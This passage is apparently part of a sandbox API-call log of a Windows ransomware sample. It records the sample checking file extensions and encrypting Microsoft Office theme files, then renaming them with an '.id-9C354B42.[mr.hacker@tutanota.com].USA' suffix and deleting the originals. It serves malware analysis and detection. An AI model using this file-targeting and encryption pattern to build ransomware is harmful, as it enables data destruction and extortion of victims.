14\\Theme Effects\\Horizon.eftx") returned 79 [0271.156] lstrlenW (lpString=".doc") returned 4 [0271.156] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0271.156] lstrlenW (lpString=".docx") returned 5 [0271.156] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0271.156] lstrlenW (lpString=".pdf") returned 4 [0271.156] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0271.156] lstrlenW (lpString=".xls") returned 4 [0271.156] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0271.156] lstrlenW (lpString=".xlsx") returned 5 [0271.156] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0271.156] lstrlenW (lpString=".ppt") returned 4 [0271.156] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0271.157] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx") returned 79 [0271.157] lstrlenW (lpString=".zip") returned 4 [0271.157] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0271.157] lstrlenW (lpString=".rar") returned 4 [0271.157] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0271.157] lstrlenW (lpString=".bz2") returned 4 [0271.157] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0271.157] lstrlenW (lpString=".7z") returned 3 [0271.157] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0271.157] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx") returned 79 [0271.157] lstrlenW (lpString=".dbf") returned 4 [0271.157] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0271.157] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx") returned 79 [0271.157] lstrlenW (lpString=".1cd") returned 4 [0271.157] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0271.157] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx") returned 79 [0271.157] lstrlenW (lpString=".jpg") returned 4 [0271.157] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0271.157] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx") returned 79 [0271.157] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx") returned 79 [0271.157] lstrlenW (lpString=".doc") returned 4 [0271.157] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0271.157] lstrlenW (lpString=".docx") returned 5 [0271.157] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0271.157] lstrlenW (lpString=".pdf") returned 4 [0271.157] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0271.157] lstrlenW (lpString=".xls") returned 4 [0271.158] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0271.158] lstrlenW (lpString=".xlsx") returned 5 [0271.158] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0271.158] lstrlenW (lpString=".ppt") returned 4 [0271.158] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0271.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx") returned 79 [0271.158] lstrlenW (lpString=".zip") returned 4 [0271.158] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0271.158] lstrlenW (lpString=".rar") returned 4 [0271.158] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0271.158] lstrlenW (lpString=".bz2") returned 4 [0271.158] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0271.158] lstrlenW (lpString=".7z") returned 3 [0271.158] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0271.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx") returned 79 [0271.158] lstrlenW (lpString=".dbf") returned 4 [0271.158] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0271.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx") returned 79 [0271.158] lstrlenW (lpString=".1cd") returned 4 [0271.158] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0271.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx") returned 79 [0271.158] lstrlenW (lpString=".jpg") returned 4 [0271.158] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0271.158] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0271.158] lstrlenW (lpString="Origin.eftx") returned 11 [0271.159] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\origin.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0271.198] GetFileSizeEx (in: hFile=0x3a8, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=40941) returned 1 [0271.198] CloseHandle (hObject=0x3a8) returned 1 [0271.198] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\origin.eftx")) returned 0x20 [0271.209] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\origin.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.209] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\origin.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0271.209] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.209] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.209] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\origin.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0271.274] GetLastError () returned 0x0 [0271.274] ReadFile (in: hFile=0x394, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x9fed, lpOverlapped=0x0) returned 1 [0271.279] WriteFile (in: hFile=0x398, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x9ff0, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0x9ff0, lpOverlapped=0x0) returned 1 [0271.280] ReadFile (in: hFile=0x394, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0271.280] WriteFile (in: hFile=0x398, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xea, lpOverlapped=0x0) returned 1 [0271.280] SetEndOfFile (hFile=0x398) returned 1 [0271.280] CloseHandle (hObject=0x398) returned 1 [0271.280] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.280] SetEndOfFile (hFile=0x394) returned 1 [0271.287] CloseHandle (hObject=0x394) returned 1 [0271.287] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.355] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\origin.eftx")) returned 1 [0271.356] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx") returned 78 [0271.356] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx") returned 78 [0271.356] lstrlenW (lpString=".doc") returned 4 [0271.356] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0271.356] lstrlenW (lpString=".docx") returned 5 [0271.356] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0271.356] lstrlenW (lpString=".pdf") returned 4 [0271.356] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0271.356] lstrlenW (lpString=".xls") returned 4 [0271.356] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0271.356] lstrlenW (lpString=".xlsx") returned 5 [0271.356] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0271.356] lstrlenW (lpString=".ppt") returned 4 [0271.356] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0271.356] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx") returned 78 [0271.356] lstrlenW (lpString=".zip") returned 4 [0271.356] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0271.356] lstrlenW (lpString=".rar") returned 4 [0271.356] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0271.357] lstrlenW (lpString=".bz2") returned 4 [0271.357] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0271.357] lstrlenW (lpString=".7z") returned 3 [0271.357] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0271.357] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx") returned 78 [0271.357] lstrlenW (lpString=".dbf") returned 4 [0271.357] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0271.357] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx") returned 78 [0271.357] lstrlenW (lpString=".1cd") returned 4 [0271.357] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0271.357] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx") returned 78 [0271.357] lstrlenW (lpString=".jpg") returned 4 [0271.357] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0271.357] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx") returned 78 [0271.357] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx") returned 78 [0271.357] lstrlenW (lpString=".doc") returned 4 [0271.357] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0271.357] lstrlenW (lpString=".docx") returned 5 [0271.357] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0271.357] lstrlenW (lpString=".pdf") returned 4 [0271.357] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0271.357] lstrlenW (lpString=".xls") returned 4 [0271.357] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0271.357] lstrlenW (lpString=".xlsx") returned 5 [0271.357] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0271.357] lstrlenW (lpString=".ppt") returned 4 [0271.357] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0271.357] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx") returned 78 [0271.357] lstrlenW (lpString=".zip") returned 4 [0271.358] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0271.358] lstrlenW (lpString=".rar") returned 4 [0271.358] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0271.358] lstrlenW (lpString=".bz2") returned 4 [0271.358] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0271.358] lstrlenW (lpString=".7z") returned 3 [0271.358] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0271.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx") returned 78 [0271.358] lstrlenW (lpString=".dbf") returned 4 [0271.358] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0271.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx") returned 78 [0271.358] lstrlenW (lpString=".1cd") returned 4 [0271.358] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0271.358] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx") returned 78 [0271.358] lstrlenW (lpString=".jpg") returned 4 [0271.358] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0271.358] lstrcmpiW (lpString1=".eftx", lpString2=".USA") returned -1 [0271.358] lstrlenW (lpString="Thatch.eftx") returned 11 [0271.358] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\thatch.eftx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0271.907] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=41295) returned 1 [0271.907] CloseHandle (hObject=0x3ac) returned 1 [0271.907] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\thatch.eftx")) returned 0x20 [0271.921] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\thatch.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.921] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\thatch.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac [0271.921] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.922] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.922] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\thatch.eftx.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0271.922] GetLastError () returned 0x0 [0271.922] ReadFile (in: hFile=0x3ac, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0xa14f, lpOverlapped=0x0) returned 1 [0271.931] WriteFile (in: hFile=0x328, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xa150, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xa150, lpOverlapped=0x0) returned 1 [0271.933] ReadFile (in: hFile=0x3ac, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0271.933] WriteFile (in: hFile=0x328, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xea, lpOverlapped=0x0) returned 1 [0271.933] SetEndOfFile (hFile=0x328) returned 1 [0271.933] CloseHandle (hObject=0x328) returned 1 [0271.933] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0271.933] SetEndOfFile (hFile=0x3ac) returned 1 [0271.938] CloseHandle (hObject=0x3ac) returned 1 [0271.938] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0271.950] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\thatch.eftx")) returned 1 [0271.950] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78 [0271.950] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78 [0271.950] lstrlenW (lpString=".doc") returned 4 [0271.950] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0271.950] lstrlenW (lpString=".docx") returned 5 [0271.950] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0271.950] lstrlenW (lpString=".pdf") returned 4 [0271.950] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0271.950] lstrlenW (lpString=".xls") returned 4 [0271.951] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0271.951] lstrlenW (lpString=".xlsx") returned 5 [0271.951] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0271.951] lstrlenW (lpString=".ppt") returned 4 [0271.951] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0271.951] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78 [0271.951] lstrlenW (lpString=".zip") returned 4 [0271.951] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0271.951] lstrlenW (lpString=".rar") returned 4 [0271.951] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0271.951] lstrlenW (lpString=".bz2") returned 4 [0271.951] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0271.951] lstrlenW (lpString=".7z") returned 3 [0271.951] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0271.951] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78 [0271.951] lstrlenW (lpString=".dbf") returned 4 [0271.951] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0271.951] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78 [0271.951] lstrlenW (lpString=".1cd") returned 4 [0271.951] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0271.951] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78 [0271.951] lstrlenW (lpString=".jpg") returned 4 [0271.951] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0271.951] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78 [0271.951] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78 [0271.951] lstrlenW (lpString=".doc") returned 4 [0271.951] lstrcmpiW (lpString1=".doc", lpString2="eftx") returned -1 [0271.951] lstrlenW (lpString=".docx") returned 5 [0271.951] lstrcmpiW (lpString1=".docx", lpString2=".eftx") returned -1 [0271.951] lstrlenW (lpString=".pdf") returned 4 [0271.951] lstrcmpiW (lpString1=".pdf", lpString2="eftx") returned -1 [0271.951] lstrlenW (lpString=".xls") returned 4 [0271.952] lstrcmpiW (lpString1=".xls", lpString2="eftx") returned -1 [0271.952] lstrlenW (lpString=".xlsx") returned 5 [0271.952] lstrcmpiW (lpString1=".xlsx", lpString2=".eftx") returned 1 [0271.952] lstrlenW (lpString=".ppt") returned 4 [0271.952] lstrcmpiW (lpString1=".ppt", lpString2="eftx") returned -1 [0271.952] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78 [0271.952] lstrlenW (lpString=".zip") returned 4 [0271.952] lstrcmpiW (lpString1=".zip", lpString2="eftx") returned -1 [0271.952] lstrlenW (lpString=".rar") returned 4 [0271.952] lstrcmpiW (lpString1=".rar", lpString2="eftx") returned -1 [0271.952] lstrlenW (lpString=".bz2") returned 4 [0271.952] lstrcmpiW (lpString1=".bz2", lpString2="eftx") returned -1 [0271.952] lstrlenW (lpString=".7z") returned 3 [0271.952] lstrcmpiW (lpString1=".7z", lpString2="ftx") returned -1 [0271.952] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78 [0271.952] lstrlenW (lpString=".dbf") returned 4 [0271.952] lstrcmpiW (lpString1=".dbf", lpString2="eftx") returned -1 [0271.952] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78 [0271.952] lstrlenW (lpString=".1cd") returned 4 [0271.952] lstrcmpiW (lpString1=".1cd", lpString2="eftx") returned -1 [0271.952] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Thatch.eftx") returned 78 [0271.952] lstrlenW (lpString=".jpg") returned 4 [0271.952] lstrcmpiW (lpString1=".jpg", lpString2="eftx") returned -1 [0271.952] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0271.952] lstrlenW (lpString="AUTOSHAP.DLL") returned 12 [0271.952] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\autoshap.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0271.954] GetFileSizeEx (in: hFile=0x388, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=15776) returned 1 [0271.954] CloseHandle (hObject=0x388) returned 1 [0271.954] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\autoshap.dll")) returned 0x20 [0271.954] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\autoshap.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0271.955] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\autoshap.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0271.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned 70 [0271.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned 70 [0271.955] lstrlenW (lpString=".doc") returned 4 [0271.955] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0271.955] lstrlenW (lpString=".docx") returned 5 [0271.955] lstrcmpiW (lpString1=".docx", lpString2="P.DLL") returned -1 [0271.955] lstrlenW (lpString=".pdf") returned 4 [0271.955] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0271.955] lstrlenW (lpString=".xls") returned 4 [0271.955] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0271.955] lstrlenW (lpString=".xlsx") returned 5 [0271.955] lstrcmpiW (lpString1=".xlsx", lpString2="P.DLL") returned -1 [0271.955] lstrlenW (lpString=".ppt") returned 4 [0271.955] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0271.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned 70 [0271.955] lstrlenW (lpString=".zip") returned 4 [0271.955] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0271.955] lstrlenW (lpString=".rar") returned 4 [0271.955] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0271.955] lstrlenW (lpString=".bz2") returned 4 [0271.955] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0271.955] lstrlenW (lpString=".7z") returned 3 [0271.955] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0271.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned 70 [0271.955] lstrlenW (lpString=".dbf") returned 4 [0271.955] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0271.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned 70 [0271.955] lstrlenW (lpString=".1cd") returned 4 [0271.955] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0271.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned 70 [0271.956] lstrlenW (lpString=".jpg") returned 4 [0271.956] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0271.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned 70 [0271.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned 70 [0271.956] lstrlenW (lpString=".doc") returned 4 [0271.956] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0271.956] lstrlenW (lpString=".docx") returned 5 [0271.956] lstrcmpiW (lpString1=".docx", lpString2="P.DLL") returned -1 [0271.956] lstrlenW (lpString=".pdf") returned 4 [0271.956] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0271.956] lstrlenW (lpString=".xls") returned 4 [0271.956] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0271.956] lstrlenW (lpString=".xlsx") returned 5 [0271.956] lstrcmpiW (lpString1=".xlsx", lpString2="P.DLL") returned -1 [0271.956] lstrlenW (lpString=".ppt") returned 4 [0271.956] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0271.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\AUTOSHAP.DLL") returned 70 [0271.956] lstrlenW (lpString=".zip") returned 4 